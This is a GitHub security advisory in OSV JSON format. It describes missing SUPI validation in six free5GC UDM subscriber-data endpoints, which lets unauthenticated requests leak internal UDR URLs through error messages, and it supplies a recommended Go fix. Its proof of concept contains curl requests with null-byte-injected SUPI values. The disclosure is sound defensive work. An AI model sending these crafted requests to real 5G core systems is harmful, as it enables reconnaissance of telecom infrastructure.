{"id":"GHSA-585v-hcgf-jhfr","summary":"Free5GC UDM has Improper Input Validation and Generation of Error Messages Containing Sensitive Information","details":"## Summary\n\nThe free5GC UDM component fails to validate the `supi` path parameter in six GET handlers of the `nudm-sdm` (Subscriber Data Management) service. An unauthenticated attacker can inject control characters into the SUPI parameter, causing UDM to forward a malformed request to UDR and return a `500 Internal Server Error` response that exposes internal infrastructure details.\n\n## Affected Package\n\n- **Ecosystem**: Go\n- **Package**: `github.com/free5gc/udm`\n- **Affected versions**: `\u003c= v1.4.2`\n- **Patched versions**: none yet\n\n## Details\n\nThe following handlers in `internal/sbi/api_subscriberdatamanagement.go` do not call `validator.IsValidSupi()` before passing the `supi` parameter to the processor:\n\n- `HandleGetSmfSelectData` — `GET /:supi/smf-select-data`\n- `HandleGetSupi` — `GET /:supi`\n- `HandleGetTraceData` — `GET /:supi/trace-data`\n- `HandleGetUeContextInSmfData` — `GET /:supi/ue-context-in-smf-data`\n- `HandleGetNssai` — `GET /:supi/nssai`\n- `HandleGetSmData` — `GET /:supi/sm-data`\n\nBy contrast, `HandleGetAmData` in the same file correctly validates the `supi` parameter:\n\n```go\n// HandleGetAmData — correctly validates (not vulnerable)\nsupi := c.Params.ByName(\"supi\")\nif !validator.IsValidSupi(supi) {\n    c.JSON(http.StatusBadRequest, problemDetail)\n    return\n}\n\n// HandleGetSmfSelectData — missing validation (vulnerable)\nsupi := c.Params.ByName(\"supi\")\n// ← no validator.IsValidSupi(supi) call\ns.Processor().GetSmfSelectDataProcedure(c, supi, plmnID, supportedFeatures)\n```\n\nThe malformed `supi` is passed to the processor which constructs a URL to forward the request to UDR. Go's `net/url` parser rejects the URL containing control characters and returns an error. UDM catches this error and responds with a `500 SYSTEM_FAILURE` that includes the full internal UDR URL in the `detail` field.\n\n**This is a missed fix of CVE-2026-27642**, which applied the same `validator.IsValidSupi()` check only to `internal/sbi/api_ueauthentication.go` (`HandleConfirmAuth` and `HandleGenerateAuthData`), leaving the SDM service handlers unpatched.\n\n## Proof of Concept\n\n```bash\n# Vulnerable — returns 500 with internal UDR URL exposed\ncurl \"http://\u003cUDM_HOST\u003e/nudm-sdm/v2/imsi-22277%00INJECTED/smf-select-data\"\ncurl \"http://\u003cUDM_HOST\u003e/nudm-sdm/v2/imsi-22277%00INJECTED/nssai\"\ncurl \"http://\u003cUDM_HOST\u003e/nudm-sdm/v2/imsi-22277%00INJECTED/trace-data\"\ncurl \"http://\u003cUDM_HOST\u003e/nudm-sdm/v2/imsi-22277%00INJECTED/sm-data\"\n\n# Expected (vulnerable) response:\n# HTTP 500\n# {\n#   \"title\": \"System failure\",\n#   \"status\": 500,\n#   \"detail\": \"parse \\\"http://udr.internal:80/nudr-dr/v2/subscription-data/imsi-22277\\x00INJECTED//provisioned-data/smf-selection-subscription-data\\\": net/url: invalid control character in URL\",\n#   \"cause\": \"SYSTEM_FAILURE\"\n# }\n\n# Protected endpoint (for comparison) — returns 400\ncurl \"http://\u003cUDM_HOST\u003e/nudm-sdm/v2/imsi-22277%00INJECTED/am-data\"\n# HTTP 400\n# {\"title\":\"Malformed request syntax\",\"status\":400,\"detail\":\"Supi is invalid\",\"cause\":\"MANDATORY_IE_INCORRECT\"}\n```\n\n## Impact\n\nAn unauthenticated remote attacker can send a crafted GET request to any of the six affected endpoints to obtain:\n\n1. Internal UDR hostname and port\n2. Full internal API path structure (`/nudr-dr/v2/subscription-data/...`)\n3. UDR API version\n4. Internal service naming convention\n\nThis information can be used to facilitate further attacks against the UDR or other internal 5G core components.\n\n## Recommended Fix\n\nAdd `validator.IsValidSupi()` to all six affected handlers, following the pattern already used in `HandleGetAmData`:\n\n```go\nsupi := c.Params.ByName(\"supi\")\nif !validator.IsValidSupi(supi) {\n    problemDetail := models.ProblemDetails{\n        Title:  \"Malformed request syntax\",\n        Status: http.StatusBadRequest,\n        Detail: \"Supi is invalid\",\n        Cause:  \"MANDATORY_IE_INCORRECT\",\n    }\n    c.Set(sbi.IN_PB_DETAILS_CTX_STR, http.StatusText(int(problemDetail.Status)))\n    c.JSON(int(problemDetail.Status), problemDetail)\n    return\n}\n```","aliases":["CVE-2026-42459","GO-2026-5138"],"modified":"2026-06-25T18:56:29.501772193Z","published":"2026-05-07T02:09:58Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-05-07T02:09:58Z","nvd_published_at":"2026-05-27T17:16:35Z","cwe_ids":["CWE-20","CWE-209"],"severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/free5gc/free5gc/security/advisories/GHSA-585v-hcgf-jhfr"},{"type":"WEB","url":"https://github.com/free5gc/free5gc/security/advisories/GHSA-h4wg-rp7m-8xx4"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42459"},{"type":"PACKAGE","url":"https://github.com/free5gc/free5gc"},{"type":"WEB","url":"https://github.com/free5gc/udm/blob/v1.4.3/internal/sbi/api_subscriberdatamanagement.go"}],"affected":[{"package":{"name":"github.com/free5gc/udm","ecosystem":"Go","purl":"pkg:golang/github.com/free5gc/udm"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"1.4.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-585v-hcgf-jhfr/GHSA-585v-hcgf-jhfr.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"}]}